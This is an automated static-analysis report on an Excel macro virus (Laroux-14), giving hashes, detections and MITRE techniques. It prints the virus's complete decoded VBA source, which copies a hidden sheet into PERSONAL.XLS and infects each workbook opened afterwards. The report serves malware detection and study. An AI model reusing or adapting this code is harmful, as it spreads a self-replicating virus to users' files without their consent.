Xls.Trojan.Laroux-14 — Office (OLE) malware analysis

Static analysis result for SHA-256 e0162a1d67b034bf…

MALICIOUS

Office (OLE)

Size: 243.0 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: fec0b7020496aaea973458a9a1e35465
SHA-1: 156bd4fbc131a7543439dcc47fdb4fa8bde01f81
SHA-256: e0162a1d67b034bffe970945f348b291fa00ff5b7a4903f005974d9caecd48d0
Risk Score: 240

Malware Insights

Xls.Trojan.Laroux-14 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The file is identified as a known Excel macro virus, specifically Xls.Trojan.Laroux-14, by multiple heuristics and ClamAV. The VBA script contains an Auto_Open macro designed to copy itself into the PERSONAL.XLS workbook, a common technique for establishing persistence. This allows the malware to execute automatically whenever Excel is launched.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-14 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-14
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster [critical] (OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4000 bytes
SHA-256: 6fc043b2432ab43eb009848b952c0dd45770e6f7a4853d328c0ea4ab51ff53c3
Detection: ClamAV: Xls.Trojan.Laroux-14
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kustyk"


Dim OldMacro$

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_kustyk"
End Sub

Sub check_kustyk()
Attribute check_kustyk.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim WhichFile
    Dim Dopisal As Boolean
    
    c4$ = CurDir()

    c$ = Application.StartupPath
    mp$ = c$ & "\" & "PERSONAL.XLS"
    m$ = Dir(mp$)
    Application.ScreenUpdating = False
    
    WhichFile = 0
    If m$ <> "PERSONAL.XLS" Then
        WhichFile = 1
    Else
        WhichFile = 2
        If Workbooks("PERSONAL.XLS").Modules.Count > 0 Then
            For i = 1 To Workbooks("PERSONAL.XLS").Modules.Count
                If Workbooks("PERSONAL.XLS").Modules(i).Name = "kustyk" Then
                    WhichFile = WhichFile + 1
                    Exit For
                End If
            Next
        End If
        If WhichFile > 2 Then
            If ActiveWorkbook.Modules.Count > 0 Then
                For i = 1 To ActiveWorkbook.Modules.Count
                    If ActiveWorkbook.Modules(i).Name = "kustyk" Then
                        WhichFile = WhichFile + 1
                        Exit For
                    End If
                Next
            End If
        End If
    End If
    ChDir c4$
    
    Select Case WhichFile
    Case 1
        On Error GoTo Blad_Zapisu1
        n4$ = ActiveWorkbook.Name
        Sheets("kustyk").Visible = True
        Sheets("kustyk").Select
        Sheets("kustyk").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        Modules.Add
        Sheets("kustyk").Visible = False
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        Application.OnSheetActivate = "personal.xls!check_kustyk"
        GoTo Pracuj_Dalej1
Blad_Zapisu1:
        Application.OnSheetActivate = ""
Pracuj_Dalej1:
        On Error GoTo 0
        ChDir c4$
        Windows(n4$).Visible = True
        Workbooks(n4$).Sheets("kustyk").Visible = False
    
    
    Case 2
        n4$ = ActiveWorkbook.Name
        On Error GoTo Blad_Zapisu2
        Sheets("kustyk").Visible = True
        Sheets("kustyk").Select
        Windows("PERSONAL.XLS").Visible = True
        Workbooks(n4$).Sheets("kustyk").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = False
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Application.OnSheetActivate = "personal.xls!check_kustyk"
        GoTo Pracuj_Dalej2
Blad_Zapisu2:
        Windows("PERSONAL.XLS").Visible = False
        Application.OnSheetActivate = ""
Pracuj_Dalej2:
        On Error GoTo 0
        Workbooks("PERSONAL.XLS").Saved = True
        Sheets("kustyk").Visible = False
    
    
    Case 3
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "kustyk" Then
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = True
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = False
            Workbooks(n4$).Sheets("kustyk").Visible = False
            Workbooks("PERSONAL.XLS").Save
        End If
        Application.OnSheetActivate = ""
        Application.OnSheetActivate = "personal.xls!check_kustyk"
    Case Else
    End Select
    Application.ScreenUpdating = True
End Sub